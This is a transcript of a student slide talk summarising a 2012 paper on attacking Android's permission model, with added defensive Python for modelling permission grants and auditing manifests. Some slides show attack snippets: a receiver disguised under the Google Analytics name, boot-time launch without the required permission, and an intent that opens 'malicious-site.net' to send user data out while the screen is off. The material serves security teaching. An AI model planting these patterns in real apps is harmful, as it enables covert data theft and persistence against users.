Messing with Android's Permission Model

Source: 2012 IEEE 11th International Conference on Trust, Security and Privacy in Computing and Communications
Authors: André Egners, Ulrike Meyer, Björn Marschollek
Presenters (group members): 9720114 王人弘, 9820117 陳冠謀, 9862218 盧軒偉

Uploaded by tamira, posted 23-Feb-2016 (PowerPoint presentation, 23 slides)

TRANSCRIPT

Page 1: Messing with Android's Permission Model

Messing with Android's Permission Model

Source: 2012 IEEE 11th International Conference on Trust, Security and Privacy in Computing and Communications
Authors: André Egners, Ulrike Meyer, Björn Marschollek
Group members: 9720114 王人弘, 9820117 陳冠謀, 9862218 盧軒偉

Page 2: Messing with Android's Permission Model

Outline
1. Introduction
2. Related work
3. Overview on Android
4. Android's permission model
5. Attacks
   1. UI takeover
   2. Starting applications after installation
   3. Starting applications at boot
   4. E.T. calling home
   5. Silently rooting Android
6. Conclusion

2/23

Page 3: Messing with Android's Permission Model

I. INTRODUCTION

When an app is installed on a mobile device, a dialog usually appears asking the user either to accept the permissions the program requests or to abort the installation. Users are generally not aware of what risks the permissions they grant may pose. The permission model's options are too coarse-grained and too inflexible, which makes it easy for an attacker to get around the model's controls. This presentation introduces Android's permission model and several ways of attacking it.

Page 4: Messing with Android's Permission Model

II. RELATED WORK

Botnets
Inter-application communication
Permissions of Android apps
Other topics related to security mechanisms and system vulnerabilities

Page 5: Messing with Android's Permission Model

III. OVERVIEW ON ANDROID

Based on the 2.6 Linux kernel

Combines the strengths of Linux (file and memory management) with Java-style type safety

Page 6: Messing with Android's Permission Model

III. OVERVIEW ON ANDROID (Cont.)


Page 7: Messing with Android's Permission Model

III. OVERVIEW ON ANDROID (Cont.)

The lowest layer is the Linux kernel, which contains process and memory management, the various device drivers, and so on; it is optimized for the needs of mobile devices. The second layer holds the libraries: the C library, the 2D/3D graphics libraries, SQLite for managing file data, etc. Also in the second layer is what the Android runtime needs, chiefly the Dalvik Virtual Machine, which is derived from the Java Virtual Machine and better suited to devices with limited resources.

Page 8: Messing with Android's Permission Model

III. OVERVIEW ON ANDROID (Cont.)

Application Framework layer: provides the APIs used by application developers. It includes the Package Manager (tracks and manages applications and their data), the Location Manager (manages applications' access to location), the View System (UI and drawing), and more. The top layer is where applications live; all third-party applications sit in this layer and can use the frameworks and libraries below it.

Page 9: Messing with Android's Permission Model

IV. ANDROID’S PERMISSION MODEL

In API version 11, 116 different permissions are predefined, e.g.
INTERNET – allows accessing the Internet
RECEIVE_SMS – for monitoring, recording, or processing incoming SMS
RECORD_AUDIO – for recording audio messages

Example: a Tetris game requesting INTERNET is reasonable, but it would be suspicious if it also requested the permission to read the address book.

Page 10: Messing with Android's Permission Model

URI Permissions

Uniform Resource Identifier. Applications may wish to pass a URI to another application in order to be able to exchange data. For example, an email application usually protects its emails from being read by other applications using additionally defined permissions. A third-party image viewer should not hold the permissions to read emails directly. The image viewer should rather be handed a URI to the data, with the Intent.FLAG_GRANT_READ_URI_PERMISSION flag set by the callee of the function. This enables the receiver, i.e., the image viewer, to read the data at the given URI.

Page 11: Messing with Android's Permission Model

Permission protection level

Level zero – normal permissions, low risk: setting a timer, making the phone vibrate. The user can request to be notified of the permission request prior to the installation of the application.

Level one – dangerous permissions, high risk: initiating phone calls, access to the device's sensors, the Internet, or sensitive user data, reading log files. Prior to the installation, the installer displays the set of requested dangerous permissions to the user, who decides to either grant or deny the whole set. Only if the user consents to all of the requested permissions can the application be installed.

Page 12: Messing with Android's Permission Model

Permission protection level (Cont.)

Level two – signature permissions: granted only if the requesting application is signed with the same certificate as the application that declared the permission. Even if the user agrees, the permission cannot be granted when the signature does not match.

Level three – signatureOrSystem: granted only to applications that are in the Android system image or that are signed with the same certificate.

Page 13: Messing with Android's Permission Model

Permission protection level (Cont.)

Some flaws: the user is only able to grant or deny all permissions at once; granting or denying a particular permission is not possible. The only alternative is refraining from installing an application which might be useful but requests too many permissions or a suspicious set of them.

Tetris example
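The grant rules on slides 11 to 13 can be written down as a small decision procedure. The Python model below is an added illustration, not code from the paper or from Android itself; the permission catalog, the app names and the certificate fingerprints are constructed. It shows the Tetris problem directly: the installer shows both dangerous permissions and offers only "accept all" or "abort", and a signature-level permission is silently withheld when the certificate check fails even though the user agreed.

```python
"""Model of the install-time permission decision described in the talk
(Android API 11 era): protection levels normal / dangerous / signature /
signatureOrSystem and the all-or-nothing consent dialog.
Added illustration; catalog, app names and certificates are constructed."""
from dataclasses import dataclass
from enum import Enum
from typing import Dict, FrozenSet, Tuple


class Level(Enum):
    NORMAL = 0                 # low risk, granted without asking
    DANGEROUS = 1              # shown to the user before installation
    SIGNATURE = 2              # requester must carry the declarer's signature
    SIGNATURE_OR_SYSTEM = 3    # ... or live in the system image


@dataclass(frozen=True)
class Permission:
    name: str
    level: Level
    declaring_cert: str        # signer of the package that declared the permission


@dataclass(frozen=True)
class App:
    name: str
    cert: str                  # the app's own signing certificate
    in_system_image: bool
    requested: Tuple[str, ...]


PLATFORM_CERT = "sha1:platform-cert"       # constructed placeholder value
CATALOG: Dict[str, Permission] = {
    "VIBRATE": Permission("VIBRATE", Level.NORMAL, PLATFORM_CERT),
    "INTERNET": Permission("INTERNET", Level.DANGEROUS, PLATFORM_CERT),
    "READ_CONTACTS": Permission("READ_CONTACTS", Level.DANGEROUS, PLATFORM_CERT),
    "INSTALL_PACKAGES": Permission("INSTALL_PACKAGES", Level.SIGNATURE_OR_SYSTEM, PLATFORM_CERT),
    # a permission a (hypothetical) mail app declared to guard its messages
    "com.example.mail.READ_MAIL": Permission("com.example.mail.READ_MAIL", Level.SIGNATURE, "sha1:mail-vendor"),
}


def grantable(perm: Permission, app: App) -> bool:
    """Whether the permission can be granted to app at all, independent of user consent."""
    if perm.level in (Level.NORMAL, Level.DANGEROUS):
        return True
    same_signer = perm.declaring_cert == app.cert
    if perm.level is Level.SIGNATURE:
        return same_signer
    return same_signer or app.in_system_image            # signatureOrSystem


def install(app: App, user_accepts: bool,
            catalog: Dict[str, Permission] = CATALOG) -> Tuple[bool, FrozenSet[str], Tuple[str, ...]]:
    """Simulate the installer.

    Returns (installed, granted permissions, permissions shown to the user).
    Only dangerous permissions are shown, and the user answers for the whole
    set: refusing one means refusing the installation.
    """
    shown = tuple(n for n in app.requested if catalog[n].level is Level.DANGEROUS)
    if shown and not user_accepts:
        return False, frozenset(), shown
    # Signature-level permissions are withheld when the certificate check fails,
    # but the app still installs without them.
    granted = frozenset(n for n in app.requested if grantable(catalog[n], app))
    return True, granted, shown


# The talk's Tetris example: INTERNET is plausible, READ_CONTACTS is not, yet
# the dialog gives no way to accept one and refuse the other.
TETRIS = App("tetris", "sha1:game-vendor", False, ("VIBRATE", "INTERNET", "READ_CONTACTS"))
# A third-party viewer asking for the mail app's signature permission and a system-only one.
VIEWER = App("viewer", "sha1:viewer-vendor", False,
             ("INTERNET", "com.example.mail.READ_MAIL", "INSTALL_PACKAGES"))

if __name__ == "__main__":
    for app in (TETRIS, VIEWER):
        ok, granted, shown = install(app, user_accepts=True)
        print(app.name, "installed:", ok, "shown:", shown, "granted:", sorted(granted))
```

Running the script prints that Tetris ends up holding READ_CONTACTS as soon as the user accepts the dialog, while the viewer installs with only INTERNET: the two signature-protected permissions never reach it, which is the behaviour slide 12 describes.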

Page 14: Messing with Android's Permission Model

Known Vulnerabilities

Log permissions
FAT32-formatted SD cards
WebKit browser

Most of these were uncovered in the past few years.

Page 15: Messing with Android's Permission Model

V. ATTACKS

1. Taking over the UI
2. Starting directly after installation
3. Also starting at boot
4. Two-way Internet communication
5. Silently rooting the device

An attack path to silently root Android

Page 16: Messing with Android's Permission Model

1. UI takeover

• KeyIntercepter
  - onKeyDown(): handle or pass
  - handle the key events but do nothing
• The Home button
  - Return to the Home screen or show a list of the recently used applications
• Installing from Android Market
  - The install button -> ?? -> The OK button

Page 17: Messing with Android's Permission Model

2. Starting Applications after Installation

• Would the user start the app?
• Register to receive the INSTALL_REFERRER intent
  - Google Analytics SDK
  - chosen by the attacker

Page 18: Messing with Android's Permission Model

2. Starting Applications after Installation (Cont.)

Receiver declaration in the manifest (same receiver name as the Google Analytics SDK uses):

    <receiver
        android:name="com.google.android.apps.analytics.AnalyticsReceiver"
        android:exported="true" >
        <intent-filter>
            <action android:name="com.android.vending.INSTALL_REFERRER"/>
        </intent-filter>
    </receiver>

Page 19: Messing with Android's Permission Model

3. Starting Applications at Boot

BOOT_COMPLETED intent. The permission RECEIVE_BOOT_COMPLETED was introduced to prevent applications from illegitimately starting at system boot... but it is forgotten: an application can successfully listen for the intent without asking for the permission.
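For a reviewer checking an APK, both auto-start patterns (the INSTALL_REFERRER receiver on slides 17 and 18 and the BOOT_COMPLETED receiver on slide 19) are visible in the manifest before the app ever runs. The Python script below is an added example, not code from the paper or the presenters; the AndroidManifest.xml it parses is constructed here, modelled on the receiver declaration shown on slide 18 with a boot receiver added. It lists every receiver registered for one of those actions and flags a BOOT_COMPLETED receiver whose manifest does not declare RECEIVE_BOOT_COMPLETED, which is exactly the omission the talk says the platform never checks.

```python
"""Static audit of an AndroidManifest.xml for the auto-start patterns the talk
describes: receivers registered for INSTALL_REFERRER (attack 2) or BOOT_COMPLETED
(attack 3), and a BOOT_COMPLETED receiver without RECEIVE_BOOT_COMPLETED.
Added example, not code from the paper; the manifest below is constructed."""
import xml.etree.ElementTree as ET
from typing import List, Tuple

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Broadcast actions that start an application without the user launching it.
AUTOSTART_ACTIONS = {
    "com.android.vending.INSTALL_REFERRER": "runs right after a Market install (attack 2)",
    "android.intent.action.BOOT_COMPLETED": "runs at every system boot (attack 3)",
}
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"
BOOT_PERMISSION = "android.permission.RECEIVE_BOOT_COMPLETED"

# Constructed manifest: the slide-18 receiver plus a boot receiver, and no
# RECEIVE_BOOT_COMPLETED among the requested permissions.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.tetris">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:label="Tetris">
    <receiver android:name="com.google.android.apps.analytics.AnalyticsReceiver"
              android:exported="true">
      <intent-filter>
        <action android:name="com.android.vending.INSTALL_REFERRER"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def _a(attr: str) -> str:
    """ElementTree's fully qualified form of an android: attribute."""
    return "{%s}%s" % (ANDROID_NS, attr)


def requested_permissions(xml_text: str) -> List[str]:
    """Permissions the installer would present, sorted for stable output."""
    root = ET.fromstring(xml_text)
    return sorted(e.get(_a("name")) for e in root.iter("uses-permission"))


def audit_manifest(xml_text: str) -> List[Tuple[str, str]]:
    """Return (receiver name, finding) pairs for every auto-start receiver."""
    root = ET.fromstring(xml_text)
    requested = set(requested_permissions(xml_text))
    findings: List[Tuple[str, str]] = []
    for receiver in root.iter("receiver"):          # <receiver> tags carry no namespace
        name = receiver.get(_a("name"), "<unnamed>")
        actions = {act.get(_a("name")) for act in receiver.iter("action")}
        for action, why in AUTOSTART_ACTIONS.items():
            if action in actions:
                findings.append((name, "listens for %s: %s" % (action, why)))
        # The permission exists but is not enforced, so a manifest that registers
        # for BOOT_COMPLETED without declaring it is the tell-tale to look for.
        if BOOT_ACTION in actions and BOOT_PERMISSION not in requested:
            findings.append((name, "BOOT_COMPLETED receiver without %s" % BOOT_PERMISSION))
    return findings


if __name__ == "__main__":
    for receiver_name, finding in audit_manifest(SAMPLE_MANIFEST):
        print("%-55s %s" % (receiver_name, finding))
```

On the constructed manifest the audit reports three findings: the Analytics-named receiver registered for INSTALL_REFERRER, the boot receiver registered for BOOT_COMPLETED, and the missing RECEIVE_BOOT_COMPLETED declaration; adding that uses-permission line removes only the last one, since registering for the boot broadcast at all is still worth a reviewer's attention.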

Page 20: Messing with Android's Permission Model

4. E.T. Calling Home

Establishing bidirectional outside communication, e.g. to a specified dropzone that receives user data, or to a command & control server of a botnet.

VIEW intent:

    startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("http://malicious-site.net"))
            .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));

Page 21: Messing with Android's Permission Model

4. E.T. Calling Home (Cont.)

Request: an HTTP GET is used to send data
URI schemes: deliver data to applications
SilentCommunicator
- screen off: start the transmission
- screen on: hide the browser

Page 22: Messing with Android's Permission Model

5. Silently Rooting Android

Modified zimperlich jailbreak: each instance runs with root privileges.

The setuid() calls, which are intended to change the owner to the user that has been assigned to the calling application, fail.

An infinite loop executes the native code until an exception occurs. The root user can install apps and the device owner will not notice!

Page 23: Messing with Android's Permission Model

VI. CONCLUSION

This paper presents several vulnerabilities in Android's permission model. Using them, an attacker can covertly establish a bidirectional channel and download additional attacks, and can further use permission requests that do not arouse suspicion to carry out more complex attacks.